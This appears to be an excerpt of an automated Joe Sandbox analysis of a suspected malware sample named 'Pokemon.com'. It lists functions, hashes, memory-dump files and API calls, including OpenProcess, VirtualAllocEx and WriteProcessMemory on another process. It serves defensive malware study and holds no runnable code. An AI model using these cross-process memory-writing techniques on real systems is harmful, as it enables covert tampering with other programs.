                                                                                                                                                                                                                                                                                      • Opcode ID: 0b481936d4d535e2d268a7560ccb0cc4f71d0babae656fe18e7eef56d0973807
                                                                                                                                                                                                                                                                                      • Instruction ID: e1ea52812207ab7e3560c6e8589d9f3b8f444d63ecaf0de2f7dd1cda1b94bf61
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b481936d4d535e2d268a7560ccb0cc4f71d0babae656fe18e7eef56d0973807
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDD1D075910206DADB689F68C895FFEB7F1EF07300F28415EE942AB692D7359D80CB90
                                                                                                                                                                                                                                                                                      Function 000F3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000F2B1D,?,?,00000034,00000800,?,00000034), ref: 000FBDF4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000F30AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000F2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 000FBDBF
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 000FBD1C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 000FBD2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 000FBD42
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000F311A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000F3167
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: cd5680ea6848fa1bf0eb105ae57d11a3cddca2ef0a5188b0dd40161b726f5c5c
                                                                                                                                                                                                                                                                                      • Instruction ID: 3aeba8c999647bd607c529e7ad6708d71d9465831381509a15bd09a04390c50e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd5680ea6848fa1bf0eb105ae57d11a3cddca2ef0a5188b0dd40161b726f5c5c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4141167290021CBEDB10DBA4CD86AEEBBB8EF49714F004095EA45B7181DA706E85DFA1
                                                                                                                                                                                                                                                                                      Function 000C1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\208079\Pokemon.com,00000104), ref: 000C1AD9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C1BA4
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C1BAE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                      • API String ID: 2506810119-2970016477
                                                                                                                                                                                                                                                                                      • Opcode ID: 2f8f0c1a45193d389cdd146f1ad1f1cf2822953913e3405c3082e1ca572f0618
                                                                                                                                                                                                                                                                                      • Instruction ID: af0f527697eef48da8975ff600a6eb9beefdf7de8935d52cf94c48a6a0d26df7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8f0c1a45193d389cdd146f1ad1f1cf2822953913e3405c3082e1ca572f0618
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A318371A40218AFCB21DB99DC85EDEBBFCEF85710B1041AEE80497212E7B04E41DB91
                                                                                                                                                                                                                                                                                      Function 000FCB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000FCBB1
                                                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 000FCBF7
                                                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001629C0,00A85C18), ref: 000FCC40
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 0aafce06b5d0746c82d4d6f51f63d1b67f285e606a409ab09074ba5d4e2fcaab
                                                                                                                                                                                                                                                                                      • Instruction ID: 4b3c6e752b9f7dfcedda79df2ec1f4ccf419b25a8df3a70539964346a51a3a91
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0aafce06b5d0746c82d4d6f51f63d1b67f285e606a409ab09074ba5d4e2fcaab
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A41E53120430A9FE720DF24DE86F6AB7E4EF85714F04461DF66997692C730E904EB92
                                                                                                                                                                                                                                                                                      Function 00124EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0012DCD0,00000000,?,?,?,?), ref: 00124F48
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 00124F65
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00124F75
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                      • Opcode ID: fd8dd8e844af9adacbf7b9b97f2348ce41d69f7c33a560d0b1db165a39d45996
                                                                                                                                                                                                                                                                                      • Instruction ID: 885649c2b54528f1e9edc6e80873c0b05add88308e1688c56aa1b00e394ac356
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd8dd8e844af9adacbf7b9b97f2348ce41d69f7c33a560d0b1db165a39d45996
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC31BE31214215AFEF208F38EC45BEA7BA9EB49334F214715F979A21E0DB74AC619B50
                                                                                                                                                                                                                                                                                      Function 00113AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00113AD4,?,?), ref: 00113DD5
                                                                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00113AD7
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00113AF8
                                                                                                                                                                                                                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00113B63
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                      • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                      • Opcode ID: e89529545eda712c856961bbe293c3542014b728f519f835115ade590d3073e4
                                                                                                                                                                                                                                                                                      • Instruction ID: 37b9c1670cec8331cfd6aab04f162e91967381debc2f5d00f08a38885ad1f145
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e89529545eda712c856961bbe293c3542014b728f519f835115ade590d3073e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B31D5396082019FCB18CF68C585EE977F1EF15314F258169E8268B396E731EF85C764
                                                                                                                                                                                                                                                                                      Function 00124954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001249DC
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001249F0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00124A14
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                      • Opcode ID: cd031a135292bfb15429178f98ab7af5628ecac6ac8ac922778f061ed9f6e76a
                                                                                                                                                                                                                                                                                      • Instruction ID: ca5243782bc2812e6c474b588643fedf00e2153a55eb564808cfa6db3845d6fc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd031a135292bfb15429178f98ab7af5628ecac6ac8ac922778f061ed9f6e76a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4821BF32610229BBDF15CF50DC42FEB3B69EF48718F110214FA156B190DBB1A8A19B90
                                                                                                                                                                                                                                                                                      Function 001250F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001251A3
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001251B1
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001251B8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                      • Opcode ID: 9d86e04cc774e509aca0b75d4196b2f7b520ed13b6c2db3d3e262ca3606091eb
                                                                                                                                                                                                                                                                                      • Instruction ID: e28109734c2cb7d3171c48100ff02013551700e21302bf9ad5bbafab06a86112
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d86e04cc774e509aca0b75d4196b2f7b520ed13b6c2db3d3e262ca3606091eb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED215EB5600659AFDB10DF14ECC1DA737AEEF5A368B040059F9009B361DB70EC61CAA0
                                                                                                                                                                                                                                                                                      Function 00124253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001242DC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001242EC
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00124312
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                      • Opcode ID: f099e21de0d0269e242c46379e97d5aa0411c776b164170d36cad79e5059a6ff
                                                                                                                                                                                                                                                                                      • Instruction ID: 7bdf0960b7083d359f4a91b144f3aeaa2443b525b74049878ddac9a99b07f7be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f099e21de0d0269e242c46379e97d5aa0411c776b164170d36cad79e5059a6ff
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC219232610128BBEF11CF95EC85FAF376EEF89754F118114F9059B190CB719C6287A0
                                                                                                                                                                                                                                                                                      Function 00105439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0010544D
                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001054A1
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,0012DCD0), ref: 00105515
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                                                                                                                                      • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                      • Opcode ID: 0df2eef577c046b0bdd4cbcc442b577e10d6e7b76da123ac1877e841d3b976a7
                                                                                                                                                                                                                                                                                      • Instruction ID: 22f752bbbbbaef4e99d481062b1dea9a7c383fe809e845e8eb822c4fe203d959
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0df2eef577c046b0bdd4cbcc442b577e10d6e7b76da123ac1877e841d3b976a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90317170A00209AFDB10DF54D885EAA77F9EF05304F1480A9F949DB3A2DB71EE85DB61
                                                                                                                                                                                                                                                                                      Function 00124C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00124CED
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00124D02
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00124D0F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                      • Opcode ID: 10c1a0584e936cb58421b2b59862bf5f73a62e9bb45904a73066dd27e7dc3a6f
                                                                                                                                                                                                                                                                                      • Instruction ID: 4572018283f225b1361d0781633a9dc7138b4478597c860b4f435e63ab17b293
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10c1a0584e936cb58421b2b59862bf5f73a62e9bb45904a73066dd27e7dc3a6f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D11E071240258BFEF219E69EC06FAB3BA8EF95B64F110514FA55E60A0C671D8619B20
                                                                                                                                                                                                                                                                                      Function 000F389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F3712
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F3723
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: GetCurrentThreadId.KERNEL32 ref: 000F372A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000F3731
                                                                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 000F38C4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F373B: GetParent.USER32(00000000), ref: 000F3746
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 000F390F
                                                                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,000F3987), ref: 000F3937
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                                                                                                                      • API String ID: 1272988791-1110647743
